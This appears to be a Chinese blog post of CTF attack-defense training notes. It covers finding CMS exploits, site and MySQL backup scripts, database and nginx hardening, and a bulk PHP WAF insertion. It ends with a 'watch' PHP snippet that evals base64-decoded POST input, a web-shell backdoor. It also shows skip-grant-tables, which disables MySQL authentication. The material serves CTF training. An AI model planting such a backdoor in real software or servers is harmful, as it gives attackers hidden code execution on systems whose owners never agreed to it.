前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CTF特训(第三天)

CTF特训(第三天)

作者头像
天钧
发布2019-07-25 09:57:26
6580
发布2019-07-25 09:57:26
举报
文章被收录于专栏:渗透云笔记

判断是否是已知的CMS或者框架

搜索通用漏洞,打开kali进行搜索有没有通用的漏洞,搜索disscuz漏洞

代码语言:javascript
复制
searchsploit diss

收集更多信息

Google、baidu已知的漏洞

验证查找常用的POC

  1. 判断是否为已知的CMS收集更多信息
  2. CMS类型
  3. CMS版本号
  4. 是否安装插件以及插件版本
  5. 补丁类型

收集更多信息,如WORDpress有无特殊配置,如他自己生成的版本号。

熟悉他使用的版本。

Google黑客技巧

POC

查看是否可以打出结果。

本地漏洞裤分享

代码语言:javascript
复制
http://www.bugscan.net/source/template/vulns/
代码语言:javascript
复制
https://www.shentoushi.top/index.php/Go/?url=http://www.cnnvd.org.cn&LinkId=34
代码语言:javascript
复制
https://www.seebug.org
代码语言:javascript
复制
http://www.nsfocus.net/index.php?act=sec_bug
代码语言:javascript
复制
https://www.shentoushi.top/index.php/Go/?url=http://www.0daybank.org&LinkId=44
代码语言:javascript
复制
https://www.shentoushi.top/index.php/Go/?url=http://0day5.com&LinkId=43
网站源码备份

远程获取文件scp -r Web1:/var/www/html/ webbak/

代码语言:javascript
复制
 #!/bin/bash
 time=`/bin/date +%F`
 bak_file="/data/backup/$time.tar.gz"
 webdir="/data/www/"
 tar zcvf $bak_file $webdir >/dev/null 2>&1 &

/bin/bash /data/bak.sh定时执行计划任务 crontable -ectl+octl+x

数据库备份

代码语言:javascript
复制
mysqldump -uroot -p --single-transaction --all-databases > backup.sql # 所有

mysqldump -u root -p --single-transaction dataname > dataname.sql  #单个

mysqldump --skip-lock-tables -uxxxx -pxxxxxx -h 166.111.9.173 -R 数据库名 > ./urlevent20180319.sql 


mysqldump -h127.0.0.1 -uroot -ppassword database |gzip >$backupDir/$database-$today.sql.gz`然后,scp回来。


#备份目录
backupDir=/home/backup/database
#mysqlDump
mysqldump=/usr/local/mariadb/bin/mysqldump
host=127.0.0.1
username=root
password=42342342
today=`date +%Y%m%d`
#要备份的数据库数组
databases=(blog chinese_medicine)
# echo $databaseCount
for database in ${databases[@]}
  do
    echo '开始备份'$database
    $mysqldump -h$host -u$username -p$password $database | gzip > $backupDir/$database-$today.sql.gz
    echo '成功备份'$database'到'$backupDir/$database-$today.sql.gz
  done


恢复mysql
mysql -uroot -p TEST < bak.sql


数据库运维

代码语言:javascript
复制
取消mysql密码认证:
修改my.cnf ,添加 skip-grant-tables

修改mysql密码
update mysql.user set password=PASSWORD('skyboy') where user='root' and host='localhost';
flush privileges;

最好先修改mysql,再修改php。一般不存在需要修改mysql密码的情况。

禁止数据库的远程连接:

use mysql;

update user set host='localhost' where user='root';

flush privileges;

CREATE USER ‘dog’@‘localhost’ IDENTIFIED BY ‘123456’;

GRANT ALL ON databasename.* TO ‘dog’@‘localhost

flush privileges;

调整站点配置文件,修改数据库连接的用户名和密码。

Linxu服务器管理

代码语言:javascript
复制
对于非必须可写的目录:
权限设置为755,拥有者设为非www-data用户;从而防止文件被篡改/删除。 

对于必须可写的目录:
根据服务器类型,上一个.htaccess, 或者修改nginx的目录配置文件,去除此路径的脚本执行权限。


对于Nginx:
location ~ /mm/(data|uploads|templets)/*.(php)$ {
deny all;
}
location ~ .php$ {
try_files $uri /404.html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
} 
修改完成之后,nginx -S reload

waf脚本

代码语言:javascript
复制
通用防御

php-WAF的批量添加:

find /var/www/html -type f -path "*.php" | xargs sed -i "s/<?php/<?php require_once('/tmp/waf.php');n/g“

WAF需要同时具备拦截和抓取流量的作用。

watch

代码语言:javascript
复制
<?php
$serverList = array(
    "127.0.0.1",
    "::1"
);
$ip = $_SERVER['REMOTE_ADDR'];

foreach ($serverList as $host){
    if( $ip===$host){
    $a = $_POST['n985de9'];
    if(isset($a)) {
        eval(base64_decode($a));
    }
    }else{
        die();
    }
}
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-06-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 网站源码备份
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档